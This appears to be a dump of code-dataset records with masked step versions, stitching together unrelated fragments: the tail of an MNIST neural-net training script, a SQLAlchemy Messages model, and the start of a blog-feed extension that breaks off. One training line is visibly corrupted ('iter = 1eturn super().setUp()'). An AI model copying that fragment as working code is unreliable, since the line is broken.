str(labels[i]))\n #print(o_a)\n #print(o_b)\n #print(lab)\n #print()\n #print(\"----\")\n\nfor n in hl_b.neurons:\n print(n.weights) \"\"\"\n\n# Let's try how well a single one-layer 10-neuron net performs!\n# Read images and labels\n\"\"\" images = IO.read_images('training')\nlabels = IO.read_labels('training')\ntest_images = IO.read_images('test')\ntest_labels = IO.read_labels('test')\nprint(\"Images & labels read!\")\n\n# Preprocess images and labels\nimages_flat = []\nlabels_oh = []\ntest_images_flat = []\n\nfor (i, l) in zip(images, labels):\n images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 255)))\n labels_oh.append(Utils.onehot_label_arr(l))\n\nfor i in test_images:\n test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 255)))\n\nprint(\"Images & labels processed!\")\n\n# Initialize weights and layer\n#weights_a = [Utils.rand_array(784, 0, 1) for _ in range(10)]\nweights_a = [[0] * 784] * 10\nhl_a = HiddenLayer(10, 784, weights_a, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1)\n\nLEARNING_RATE = 0.05\n\niter = 1eturn super().setUp()\nprev_correct = 0\n#old_weights = weights_a\nwhile True:\n print(\"Iteration: \" + str(iter))\n\n j = 1\n for (img, lab) in zip(images_flat, labels_oh):\n o_a = hl_a.generate_output(img)\n grads = Backpropagation.output_layer_backpropagate(hl_a, o_a, lab, img, LEARNING_RATE)\n \n if j % 1000 == 0:\n print(\" \" + str(j))\n j += 1\n\n right_amount = 0\n for (img, lab) in zip(test_images_flat, test_labels):\n o_a = hl_a.generate_output(img)\n pred = Utils.make_prediction(o_a)\n if pred == lab:\n right_amount += 1\n \n print(\"Correct predictions: \" + str(right_amount))\n\n if (iter > 10):\n break\n\n prev_correct = right_amount\n iter = iter + 1 \"\"\"\n\n#IO.save_layer(hl_a, \"test1_3\")\n\n\n\n# Visualize weights!\n\"\"\" hl_a = IO.load_layer(\"test1_3\")\n\ni = 0\nfor n in hl_a.neurons:\n weights = n.weights\n weights = Utils.fit_arr(weights, 0, 255)\n #print(weights)\n IO.save_image(Utils.deflatten_2d(weights, 28, 28), \"w\" + str(i))\n i += 1 \"\"\"\n\n\n\n# Final boss: a 32-16-10 multi-layer net!\nimages = IO.read_images('training')\nlabels = IO.read_labels('training')\ntest_images = IO.read_images('test')\ntest_labels = IO.read_labels('test')\nprint(\"Images & labels read!\")\n\n# Preprocess images and labels\nimages_flat = []\nlabels_oh = []\ntest_images_flat = []\n\nfor (i, l) in zip(images, labels):\n images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\n labels_oh.append(Utils.onehot_label_arr(l))\n\nfor i in test_images:\n test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\n\nprint(\"Images & labels processed!\")\n\n# Don't change these two\nIMAGE_INPUT_SIZE = 784\nOUTPUT_LAYER_SIZE = 10\n\n# These define how many neurons in layers A & B\nLAYER_A_SIZE = 32\nLAYER_B_SIZE = 16\n\n# Initialize weights and layer\nweights_a = [Utils.rand_array(IMAGE_INPUT_SIZE, -1, 1) for _ in range(LAYER_A_SIZE)]\nweights_b = [Utils.rand_array(LAYER_A_SIZE, -1, 1) for _ in range(LAYER_B_SIZE)]\nweights_op = [Utils.rand_array(LAYER_B_SIZE, -1, 1) for _ in range(OUTPUT_LAYER_SIZE)]\n\nhl_a = HiddenLayer(LAYER_A_SIZE, IMAGE_INPUT_SIZE, weights_a, Activation.sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.mean_quadratic_d, 0)\nhl_b = HiddenLayer(LAYER_B_SIZE, LAYER_A_SIZE, weights_b, Activation.sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.mean_quadratic_d, 0)\nopl = HiddenLayer(OUTPUT_LAYER_SIZE, LAYER_B_SIZE, weights_op, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0)\n\n# ---- Change these if you want to play around with the program ----\n\n# These decide when the training stops\nITERATION_CAP = 20 # after 20 iterations or\nACCURACY_CAP = 6500 # at 65% accuracy\n\n# These adjust the learning process\nINITIAL_LEARNING_RATE = 0.05\nLEARNING_DECAY_SCALAR = 0.0025\nBATCH_SIZE = 100\n\n# ----------------\n\nlearning_rate = INITIAL_LEARNING_RATE\niter = 1\nprev_correct = 0\n\nwhile True:\n print(\"Iteration: \" + str(iter))\n\n learning_rate = Rate.decaying(learning_rate, iter, LEARNING_DECAY_SCALAR)\n\n print(\"Learning rate: \" + str(learning_rate))\n \n j = 1\n batchtracker = 0\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n\n for (img, lab) in zip(images_flat, labels_oh):\n o_a = hl_a.generate_output(img)\n o_b = hl_b.generate_output(o_a['op'])\n output = opl.generate_output(o_b['op'])\n\n img_sum = img_sum + img\n lab_sum = lab_sum + Vector(lab)\n oa_sum = oa_sum + o_a['op']\n ob_sum = ob_sum + o_b['op']\n op_sum = op_sum + output['op']\n\n batchtracker = batchtracker + 1\n\n if batchtracker == BATCH_SIZE:\n img_sum = img_sum * (1 / BATCH_SIZE)\n lab_sum = lab_sum * (1 / BATCH_SIZE)\n oa_sum = oa_sum * (1 / BATCH_SIZE)\n ob_sum = ob_sum * (1 / BATCH_SIZE)\n op_sum = op_sum * (1 / BATCH_SIZE)\n\n #print(opl.loss(lab_sum, op_sum))\n\n opl_backprop = Backpropagation.output_layer_backpropagate(opl, op_sum, lab, ob_sum, learning_rate)\n hl_b_backprop = Backpropagation.hidden_layer_backpropagate(hl_b, oa_sum, ob_sum, opl_backprop, learning_rate)\n hl_a_backprop = Backpropagation.hidden_layer_backpropagate(hl_a, img, oa_sum, hl_b_backprop, learning_rate)\n\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n batchtracker = 0\n\n \n if j % 10000 == 0:\n print(\" \" + str(j))\n j += 1\n\n print(\"Iteration \" + str(iter) + \" done! Now testing accuracy...\")\n\n right_amount = 0\n for (img_t, lab_t) in zip(test_images_flat, test_labels):\n oa = hl_a.generate_output(img_t)['op']\n ob = hl_b.generate_output(oa)['op']\n op = opl.generate_output(ob)['op']\n pred = Utils.make_prediction(op)\n if pred == lab_t:\n right_amount += 1\n \n print(\"Correct predictions: \" + str(right_amount))\n\n if (iter >= ITERATION_CAP):\n break\n \n if (prev_correct >= ACCURACY_CAP):\n break\n\n #if (prev_correct > right_amount):\n # break\n\n prev_correct = right_amount\n iter = iter + 1\n\nIO.save_layer(hl_a, \"test_layer_a\")\nIO.save_layer(hl_b, \"test_layer_b\")\nIO.save_layer(opl, \"test_layer_c\")", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import time from sqlalchemy import Column, Unicode, UnicodeText, Integer from models.base_model import SQLMixin, db, SQLBase class Messages(SQLMixin, SQLBase): __tablename__ = 'Messages' title = Column(Unicode(50), nullable=False) content = Column(UnicodeText, nullable=False) sender_id = Column(Integer, nullable=False) receiver_id = Column(Integer, nullable=False)
normal
{ "blob_id": "6fbf64e2dc2836a54e54ee009be1d0d8d7c7037a", "index": 1688, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Messages(SQLMixin, SQLBase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Messages(SQLMixin, SQLBase):\n __tablename__ = 'Messages'\n title = Column(Unicode(50), nullable=False)\n content = Column(UnicodeText, nullable=False)\n sender_id = Column(Integer, nullable=False)\n receiver_id = Column(Integer, nullable=False)\n", "step-4": "import time\nfrom sqlalchemy import Column, Unicode, UnicodeText, Integer\nfrom models.base_model import SQLMixin, db, SQLBase\n\n\nclass Messages(SQLMixin, SQLBase):\n __tablename__ = 'Messages'\n title = Column(Unicode(50), nullable=False)\n content = Column(UnicodeText, nullable=False)\n sender_id = Column(Integer, nullable=False)\n receiver_id = Column(Integer, nullable=False)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Copyright (c) 2017, Matt Layman import bisect import configparser import os import smartypants from werkzeug.contrib.atom import AtomFeed, FeedEntry from handroll import logger from handroll.exceptions import AbortError from handroll.extensions.base import Extension from handroll.i18n import _ class BlogPost(object): def __init__(self, **kwargs): self.date = kwargs['date'] self.source_file = kwargs['source_file'] self.summary = smartypants.smartypants(kwargs['summary']) self.title = smartypants.smartypants(kwargs['title']) self.route = kwargs['route'] self.url = kwargs['url'] # Having the posts enables a blog post to find its relationships. self._posts = kwargs['posts'] def __eq__(self, other): if other is None: return False return self.__dict__ == other.__dict__ def __lt__(self, other): return self.date < other.date def __ne__(self, other): return not self.__eq__(other) def __repr__(self): return 'BlogPost({}, {})'.format(self.source_file, self.date) @property def next(self): """Get the next chronological blog post.""" posts_by_date = self.posts_by_date index = bisect.bisect_left(posts_by_date, self) if index + 1 == len(posts_by_date): return None return posts_by_date[index + 1] @property def previous(self): """Get the previous chronological blog post.""" posts_by_date = self.posts_by_date index = bisect.bisect_left(posts_by_date, self) if index == 0: return None return posts_by_date[index - 1] @property def posts_by_date(self): return sorted(self._posts.values(), key=lambda p: p.date) class BlogExtension(Extension): """Track files marked as blog entries and generate a feed.""" handle_frontmatter_loaded = True handle_pre_composition = True handle_post_composition = True required_metadata = { 'author': 'atom_author', 'id': 'atom_id', 'title': 'atom_title', 'url': 'atom_url', } def __init__(self, config): super(BlogExtension, self).__init__(config) self.posts = {} self.atom_metadata = {} self.atom_output = '' self.list_template = None self.list_output = None self._resolver = None self._should_generate = True def on_pre_composition(self, director): """Check that all the required configuration exists.""" if not self._config.parser.has_section('blog'): raise AbortError( _('A blog section is missing in the configuration file.')) # Collect atom feed configuration. for metadata, option in self.required_metadata.items(): self._add_atom_metadata(metadata, option) self.atom_output = self._get_option('atom_output') # Collect HTML listing configuration. if self._config.parser.has_option('blog', 'list_template'): self.list_template = self._get_option('list_template') self.list_output = self._get_option('list_output') # Grab the resolver from the director for determining URLs for posts. self._resolver = director.resolver def on_frontmatter_loaded(self, source_file, frontmatter): """Record any new blog posts.""" if not self._is_post(frontmatter): return self._validate_post(source_file, frontmatter) post = BlogPost( date=frontmatter['date'], source_file=source_file, summary=frontmatter.get('summary', ''), title=frontmatter['title'], route=self._resolver.as_route(source_file), url=self._resolver.as_url(source_file), posts=self.posts, ) frontmatter['post'] = post if post != self.posts.get(source_file): self.posts[source_file] = post self._should_generate = True def on_post_composition(self, director): """Generate blog output.""" if not self._should_generate: return blog_posts = sorted( self.posts.values(), key=lambda p: p.date, reverse=True) self._generate_atom_feed(director, blog_posts) if self.list_template is not None: self._generate_list_page(director, blog_posts) self._should_generate = False def _is_post(self, frontmatter): """Check if the front matter looks like a blog post.""" is_post = frontmatter.get('blog', False) if type(is_post) != bool: raise AbortError( _('Invalid blog frontmatter (expects True or False): ' '{blog_value}').format(blog_value=is_post)) return is_post def _validate_post(self, source_file, frontmatter): """Validate that the post contains all the required fields.""" required = set([ 'date', 'title', ]) fields = set(frontmatter.keys()) missing = required - fields if missing: raise AbortError(_( 'The blog post, {filename}, ' 'is missing required fields: {missing_fields}'.format( filename=source_file, missing_fields=', '.join(missing)))) def _generate_atom_feed(self, director, blog_posts): """Generate the atom feed.""" logger.info(_('Generating Atom XML feed ...')) builder = FeedBuilder(self.atom_metadata) builder.add(blog_posts) output_file = os.path.join(director.outdir, self.atom_output) builder.write_to(output_file) def _generate_list_page(self, director, blog_posts): """Generate the list page.""" logger.info(_('Generating blog list page ...')) template = director.catalog.get_template(self.list_template) builder = ListPageBuilder(template) builder.add(blog_posts) output_file = os.path.join(director.outdir, self.list_output) builder.write_to(output_file) def _add_atom_metadata(self, name, option): """Add atom metadata from the config parser.""" self.atom_metadata[name] = self._get_option(option) def _get_option(self, option): """Get an option out of the blog section.""" try: return self._config.parser.get('blog', option) except configparser.NoOptionError: raise AbortError( _('The blog extension requires the {option} option.').format( option=option)) class BlogBuilder(object): """A template pattern class for generating output related to a blog.""" def _generate_output(self): """Generate output that belongs in the destination file. Subclasses must implement this method. """ raise NotImplementedError() def write_to(self, filepath): """Write the output to the provided filepath.""" output = self._generate_output() with open(filepath, 'wb') as out: out.write(output.encode('utf-8')) out.write(b'<!-- handrolled for excellence -->\n') class FeedBuilder(BlogBuilder): """Transform blog metadata and posts into an Atom feed.""" def __init__(self, metadata): self.metadata = metadata self._feed = AtomFeed(**metadata) def add(self, posts): """Add blog posts to the feed.""" for post in posts: self._feed.add(FeedEntry( summary=post.summary, title=post.title, title_type='html', url=post.url, updated=post.date, )) def _generate_output(self): return self._feed.to_string() class ListPageBuilder(BlogBuilder): """Transform blog posts into a list page.""" def __init__(self, template): self._template = template self._blog_list = '' self._posts = None def add(self, posts): """Add the posts and generate a blog list.""" li_html = [] for post in posts: li_html.append( u'<li><a href="{route}">{title}</a></li>'.format( route=post.route, title=post.title)) self._blog_list = u'\n'.join(li_html) self._posts = posts def _generate_output(self): context = { 'blog_list': self._blog_list, 'posts': self._posts, } return self._template.render(context)
normal
{ "blob_id": "c3d9ad49b62c56dfbd9674cb1ac5c206e6401a27", "index": 830, "step-1": "<mask token>\n\n\nclass BlogBuilder(object):\n <mask token>\n\n def _generate_output(self):\n \"\"\"Generate output that belongs in the destination file.\n\n Subclasses must implement this method.\n \"\"\"\n raise NotImplementedError()\n\n def write_to(self, filepath):\n \"\"\"Write the output to the provided filepath.\"\"\"\n output = self._generate_output()\n with open(filepath, 'wb') as out:\n out.write(output.encode('utf-8'))\n out.write(b'<!-- handrolled for excellence -->\\n')\n\n\nclass FeedBuilder(BlogBuilder):\n \"\"\"Transform blog metadata and posts into an Atom feed.\"\"\"\n\n def __init__(self, metadata):\n self.metadata = metadata\n self._feed = AtomFeed(**metadata)\n\n def add(self, posts):\n \"\"\"Add blog posts to the feed.\"\"\"\n for post in posts:\n self._feed.add(FeedEntry(summary=post.summary, title=post.title,\n title_type='html', url=post.url, updated=post.date))\n\n def _generate_output(self):\n return self._feed.to_string()\n\n\nclass ListPageBuilder(BlogBuilder):\n \"\"\"Transform blog posts into a list page.\"\"\"\n\n def __init__(self, template):\n self._template = template\n self._blog_list = ''\n self._posts = None\n\n def add(self, posts):\n \"\"\"Add the posts and generate a blog list.\"\"\"\n li_html = []\n for post in posts:\n li_html.append(u'<li><a href=\"{route}\">{title}</a></li>'.format\n (route=post.route, title=post.title))\n self._blog_list = u'\\n'.join(li_html)\n self._posts = posts\n\n def _generate_output(self):\n context = {'blog_list': self._blog_list, 'posts': self._posts}\n return self._template.render(context)\n", "step-2": "<mask token>\n\n\nclass BlogExtension(Extension):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, config):\n super(BlogExtension, self).__init__(config)\n self.posts = {}\n self.atom_metadata = {}\n self.atom_output = ''\n self.list_template = None\n self.list_output = None\n self._resolver = None\n self._should_generate = True\n\n def on_pre_composition(self, director):\n \"\"\"Check that all the required configuration exists.\"\"\"\n if not self._config.parser.has_section('blog'):\n raise AbortError(_(\n 'A blog section is missing in the configuration file.'))\n for metadata, option in self.required_metadata.items():\n self._add_atom_metadata(metadata, option)\n self.atom_output = self._get_option('atom_output')\n if self._config.parser.has_option('blog', 'list_template'):\n self.list_template = self._get_option('list_template')\n self.list_output = self._get_option('list_output')\n self._resolver = director.resolver\n <mask token>\n\n def on_post_composition(self, director):\n \"\"\"Generate blog output.\"\"\"\n if not self._should_generate:\n return\n blog_posts = sorted(self.posts.values(), key=lambda p: p.date,\n reverse=True)\n self._generate_atom_feed(director, blog_posts)\n if self.list_template is not None:\n self._generate_list_page(director, blog_posts)\n self._should_generate = False\n\n def _is_post(self, frontmatter):\n \"\"\"Check if the front matter looks like a blog post.\"\"\"\n is_post = frontmatter.get('blog', False)\n if type(is_post) != bool:\n raise AbortError(_(\n 'Invalid blog frontmatter (expects True or False): {blog_value}'\n ).format(blog_value=is_post))\n return is_post\n\n def _validate_post(self, source_file, frontmatter):\n \"\"\"Validate that the post contains all the required fields.\"\"\"\n required = set(['date', 'title'])\n fields = set(frontmatter.keys())\n missing = required - fields\n if missing:\n raise AbortError(_(\n 'The blog post, {filename}, is missing required fields: {missing_fields}'\n .format(filename=source_file, missing_fields=', '.join(\n missing))))\n\n def _generate_atom_feed(self, director, blog_posts):\n \"\"\"Generate the atom feed.\"\"\"\n logger.info(_('Generating Atom XML feed ...'))\n builder = FeedBuilder(self.atom_metadata)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.atom_output)\n builder.write_to(output_file)\n\n def _generate_list_page(self, director, blog_posts):\n \"\"\"Generate the list page.\"\"\"\n logger.info(_('Generating blog list page ...'))\n template = director.catalog.get_template(self.list_template)\n builder = ListPageBuilder(template)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.list_output)\n builder.write_to(output_file)\n\n def _add_atom_metadata(self, name, option):\n \"\"\"Add atom metadata from the config parser.\"\"\"\n self.atom_metadata[name] = self._get_option(option)\n\n def _get_option(self, option):\n \"\"\"Get an option out of the blog section.\"\"\"\n try:\n return self._config.parser.get('blog', option)\n except configparser.NoOptionError:\n raise AbortError(_(\n 'The blog extension requires the {option} option.').format(\n option=option))\n\n\nclass BlogBuilder(object):\n \"\"\"A template pattern class for generating output related to a blog.\"\"\"\n\n def _generate_output(self):\n \"\"\"Generate output that belongs in the destination file.\n\n Subclasses must implement this method.\n \"\"\"\n raise NotImplementedError()\n\n def write_to(self, filepath):\n \"\"\"Write the output to the provided filepath.\"\"\"\n output = self._generate_output()\n with open(filepath, 'wb') as out:\n out.write(output.encode('utf-8'))\n out.write(b'<!-- handrolled for excellence -->\\n')\n\n\nclass FeedBuilder(BlogBuilder):\n \"\"\"Transform blog metadata and posts into an Atom feed.\"\"\"\n\n def __init__(self, metadata):\n self.metadata = metadata\n self._feed = AtomFeed(**metadata)\n\n def add(self, posts):\n \"\"\"Add blog posts to the feed.\"\"\"\n for post in posts:\n self._feed.add(FeedEntry(summary=post.summary, title=post.title,\n title_type='html', url=post.url, updated=post.date))\n\n def _generate_output(self):\n return self._feed.to_string()\n\n\nclass ListPageBuilder(BlogBuilder):\n \"\"\"Transform blog posts into a list page.\"\"\"\n\n def __init__(self, template):\n self._template = template\n self._blog_list = ''\n self._posts = None\n\n def add(self, posts):\n \"\"\"Add the posts and generate a blog list.\"\"\"\n li_html = []\n for post in posts:\n li_html.append(u'<li><a href=\"{route}\">{title}</a></li>'.format\n (route=post.route, title=post.title))\n self._blog_list = u'\\n'.join(li_html)\n self._posts = posts\n\n def _generate_output(self):\n context = {'blog_list': self._blog_list, 'posts': self._posts}\n return self._template.render(context)\n", "step-3": "<mask token>\n\n\nclass BlogPost(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass BlogExtension(Extension):\n \"\"\"Track files marked as blog entries and generate a feed.\"\"\"\n handle_frontmatter_loaded = True\n handle_pre_composition = True\n handle_post_composition = True\n required_metadata = {'author': 'atom_author', 'id': 'atom_id', 'title':\n 'atom_title', 'url': 'atom_url'}\n\n def __init__(self, config):\n super(BlogExtension, self).__init__(config)\n self.posts = {}\n self.atom_metadata = {}\n self.atom_output = ''\n self.list_template = None\n self.list_output = None\n self._resolver = None\n self._should_generate = True\n\n def on_pre_composition(self, director):\n \"\"\"Check that all the required configuration exists.\"\"\"\n if not self._config.parser.has_section('blog'):\n raise AbortError(_(\n 'A blog section is missing in the configuration file.'))\n for metadata, option in self.required_metadata.items():\n self._add_atom_metadata(metadata, option)\n self.atom_output = self._get_option('atom_output')\n if self._config.parser.has_option('blog', 'list_template'):\n self.list_template = self._get_option('list_template')\n self.list_output = self._get_option('list_output')\n self._resolver = director.resolver\n\n def on_frontmatter_loaded(self, source_file, frontmatter):\n \"\"\"Record any new blog posts.\"\"\"\n if not self._is_post(frontmatter):\n return\n self._validate_post(source_file, frontmatter)\n post = BlogPost(date=frontmatter['date'], source_file=source_file,\n summary=frontmatter.get('summary', ''), title=frontmatter[\n 'title'], route=self._resolver.as_route(source_file), url=self.\n _resolver.as_url(source_file), posts=self.posts)\n frontmatter['post'] = post\n if post != self.posts.get(source_file):\n self.posts[source_file] = post\n self._should_generate = True\n\n def on_post_composition(self, director):\n \"\"\"Generate blog output.\"\"\"\n if not self._should_generate:\n return\n blog_posts = sorted(self.posts.values(), key=lambda p: p.date,\n reverse=True)\n self._generate_atom_feed(director, blog_posts)\n if self.list_template is not None:\n self._generate_list_page(director, blog_posts)\n self._should_generate = False\n\n def _is_post(self, frontmatter):\n \"\"\"Check if the front matter looks like a blog post.\"\"\"\n is_post = frontmatter.get('blog', False)\n if type(is_post) != bool:\n raise AbortError(_(\n 'Invalid blog frontmatter (expects True or False): {blog_value}'\n ).format(blog_value=is_post))\n return is_post\n\n def _validate_post(self, source_file, frontmatter):\n \"\"\"Validate that the post contains all the required fields.\"\"\"\n required = set(['date', 'title'])\n fields = set(frontmatter.keys())\n missing = required - fields\n if missing:\n raise AbortError(_(\n 'The blog post, {filename}, is missing required fields: {missing_fields}'\n .format(filename=source_file, missing_fields=', '.join(\n missing))))\n\n def _generate_atom_feed(self, director, blog_posts):\n \"\"\"Generate the atom feed.\"\"\"\n logger.info(_('Generating Atom XML feed ...'))\n builder = FeedBuilder(self.atom_metadata)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.atom_output)\n builder.write_to(output_file)\n\n def _generate_list_page(self, director, blog_posts):\n \"\"\"Generate the list page.\"\"\"\n logger.info(_('Generating blog list page ...'))\n template = director.catalog.get_template(self.list_template)\n builder = ListPageBuilder(template)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.list_output)\n builder.write_to(output_file)\n\n def _add_atom_metadata(self, name, option):\n \"\"\"Add atom metadata from the config parser.\"\"\"\n self.atom_metadata[name] = self._get_option(option)\n\n def _get_option(self, option):\n \"\"\"Get an option out of the blog section.\"\"\"\n try:\n return self._config.parser.get('blog', option)\n except configparser.NoOptionError:\n raise AbortError(_(\n 'The blog extension requires the {option} option.').format(\n option=option))\n\n\nclass BlogBuilder(object):\n \"\"\"A template pattern class for generating output related to a blog.\"\"\"\n\n def _generate_output(self):\n \"\"\"Generate output that belongs in the destination file.\n\n Subclasses must implement this method.\n \"\"\"\n raise NotImplementedError()\n\n def write_to(self, filepath):\n \"\"\"Write the output to the provided filepath.\"\"\"\n output = self._generate_output()\n with open(filepath, 'wb') as out:\n out.write(output.encode('utf-8'))\n out.write(b'<!-- handrolled for excellence -->\\n')\n\n\nclass FeedBuilder(BlogBuilder):\n \"\"\"Transform blog metadata and posts into an Atom feed.\"\"\"\n\n def __init__(self, metadata):\n self.metadata = metadata\n self._feed = AtomFeed(**metadata)\n\n def add(self, posts):\n \"\"\"Add blog posts to the feed.\"\"\"\n for post in posts:\n self._feed.add(FeedEntry(summary=post.summary, title=post.title,\n title_type='html', url=post.url, updated=post.date))\n\n def _generate_output(self):\n return self._feed.to_string()\n\n\nclass ListPageBuilder(BlogBuilder):\n \"\"\"Transform blog posts into a list page.\"\"\"\n\n def __init__(self, template):\n self._template = template\n self._blog_list = ''\n self._posts = None\n\n def add(self, posts):\n \"\"\"Add the posts and generate a blog list.\"\"\"\n li_html = []\n for post in posts:\n li_html.append(u'<li><a href=\"{route}\">{title}</a></li>'.format\n (route=post.route, title=post.title))\n self._blog_list = u'\\n'.join(li_html)\n self._posts = posts\n\n def _generate_output(self):\n context = {'blog_list': self._blog_list, 'posts': self._posts}\n return self._template.render(context)\n", "step-4": "<mask token>\n\n\nclass BlogPost(object):\n\n def __init__(self, **kwargs):\n self.date = kwargs['date']\n self.source_file = kwargs['source_file']\n self.summary = smartypants.smartypants(kwargs['summary'])\n self.title = smartypants.smartypants(kwargs['title'])\n self.route = kwargs['route']\n self.url = kwargs['url']\n self._posts = kwargs['posts']\n <mask token>\n\n def __lt__(self, other):\n return self.date < other.date\n\n def __ne__(self, other):\n return not self.__eq__(other)\n <mask token>\n\n @property\n def next(self):\n \"\"\"Get the next chronological blog post.\"\"\"\n posts_by_date = self.posts_by_date\n index = bisect.bisect_left(posts_by_date, self)\n if index + 1 == len(posts_by_date):\n return None\n return posts_by_date[index + 1]\n <mask token>\n <mask token>\n\n\nclass BlogExtension(Extension):\n \"\"\"Track files marked as blog entries and generate a feed.\"\"\"\n handle_frontmatter_loaded = True\n handle_pre_composition = True\n handle_post_composition = True\n required_metadata = {'author': 'atom_author', 'id': 'atom_id', 'title':\n 'atom_title', 'url': 'atom_url'}\n\n def __init__(self, config):\n super(BlogExtension, self).__init__(config)\n self.posts = {}\n self.atom_metadata = {}\n self.atom_output = ''\n self.list_template = None\n self.list_output = None\n self._resolver = None\n self._should_generate = True\n\n def on_pre_composition(self, director):\n \"\"\"Check that all the required configuration exists.\"\"\"\n if not self._config.parser.has_section('blog'):\n raise AbortError(_(\n 'A blog section is missing in the configuration file.'))\n for metadata, option in self.required_metadata.items():\n self._add_atom_metadata(metadata, option)\n self.atom_output = self._get_option('atom_output')\n if self._config.parser.has_option('blog', 'list_template'):\n self.list_template = self._get_option('list_template')\n self.list_output = self._get_option('list_output')\n self._resolver = director.resolver\n\n def on_frontmatter_loaded(self, source_file, frontmatter):\n \"\"\"Record any new blog posts.\"\"\"\n if not self._is_post(frontmatter):\n return\n self._validate_post(source_file, frontmatter)\n post = BlogPost(date=frontmatter['date'], source_file=source_file,\n summary=frontmatter.get('summary', ''), title=frontmatter[\n 'title'], route=self._resolver.as_route(source_file), url=self.\n _resolver.as_url(source_file), posts=self.posts)\n frontmatter['post'] = post\n if post != self.posts.get(source_file):\n self.posts[source_file] = post\n self._should_generate = True\n\n def on_post_composition(self, director):\n \"\"\"Generate blog output.\"\"\"\n if not self._should_generate:\n return\n blog_posts = sorted(self.posts.values(), key=lambda p: p.date,\n reverse=True)\n self._generate_atom_feed(director, blog_posts)\n if self.list_template is not None:\n self._generate_list_page(director, blog_posts)\n self._should_generate = False\n\n def _is_post(self, frontmatter):\n \"\"\"Check if the front matter looks like a blog post.\"\"\"\n is_post = frontmatter.get('blog', False)\n if type(is_post) != bool:\n raise AbortError(_(\n 'Invalid blog frontmatter (expects True or False): {blog_value}'\n ).format(blog_value=is_post))\n return is_post\n\n def _validate_post(self, source_file, frontmatter):\n \"\"\"Validate that the post contains all the required fields.\"\"\"\n required = set(['date', 'title'])\n fields = set(frontmatter.keys())\n missing = required - fields\n if missing:\n raise AbortError(_(\n 'The blog post, {filename}, is missing required fields: {missing_fields}'\n .format(filename=source_file, missing_fields=', '.join(\n missing))))\n\n def _generate_atom_feed(self, director, blog_posts):\n \"\"\"Generate the atom feed.\"\"\"\n logger.info(_('Generating Atom XML feed ...'))\n builder = FeedBuilder(self.atom_metadata)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.atom_output)\n builder.write_to(output_file)\n\n def _generate_list_page(self, director, blog_posts):\n \"\"\"Generate the list page.\"\"\"\n logger.info(_('Generating blog list page ...'))\n template = director.catalog.get_template(self.list_template)\n builder = ListPageBuilder(template)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.list_output)\n builder.write_to(output_file)\n\n def _add_atom_metadata(self, name, option):\n \"\"\"Add atom metadata from the config parser.\"\"\"\n self.atom_metadata[name] = self._get_option(option)\n\n def _get_option(self, option):\n \"\"\"Get an option out of the blog section.\"\"\"\n try:\n return self._config.parser.get('blog', option)\n except configparser.NoOptionError:\n raise AbortError(_(\n 'The blog extension requires the {option} option.').format(\n option=option))\n\n\nclass BlogBuilder(object):\n \"\"\"A template pattern class for generating output related to a blog.\"\"\"\n\n def _generate_output(self):\n \"\"\"Generate output that belongs in the destination file.\n\n Subclasses must implement this method.\n \"\"\"\n raise NotImplementedError()\n\n def write_to(self, filepath):\n \"\"\"Write the output to the provided filepath.\"\"\"\n output = self._generate_output()\n with open(filepath, 'wb') as out:\n out.write(output.encode('utf-8'))\n out.write(b'<!-- handrolled for excellence -->\\n')\n\n\nclass FeedBuilder(BlogBuilder):\n \"\"\"Transform blog metadata and posts into an Atom feed.\"\"\"\n\n def __init__(self, metadata):\n self.metadata = metadata\n self._feed = AtomFeed(**metadata)\n\n def add(self, posts):\n \"\"\"Add blog posts to the feed.\"\"\"\n for post in posts:\n self._feed.add(FeedEntry(summary=post.summary, title=post.title,\n title_type='html', url=post.url, updated=post.date))\n\n def _generate_output(self):\n return self._feed.to_string()\n\n\nclass ListPageBuilder(BlogBuilder):\n \"\"\"Transform blog posts into a list page.\"\"\"\n\n def __init__(self, template):\n self._template = template\n self._blog_list = ''\n self._posts = None\n\n def add(self, posts):\n \"\"\"Add the posts and generate a blog list.\"\"\"\n li_html = []\n for post in posts:\n li_html.append(u'<li><a href=\"{route}\">{title}</a></li>'.format\n (route=post.route, title=post.title))\n self._blog_list = u'\\n'.join(li_html)\n self._posts = posts\n\n def _generate_output(self):\n context = {'blog_list': self._blog_list, 'posts': self._posts}\n return self._template.render(context)\n", "step-5": "# Copyright (c) 2017, Matt Layman\n\nimport bisect\nimport configparser\nimport os\n\nimport smartypants\nfrom werkzeug.contrib.atom import AtomFeed, FeedEntry\n\nfrom handroll import logger\nfrom handroll.exceptions import AbortError\nfrom handroll.extensions.base import Extension\nfrom handroll.i18n import 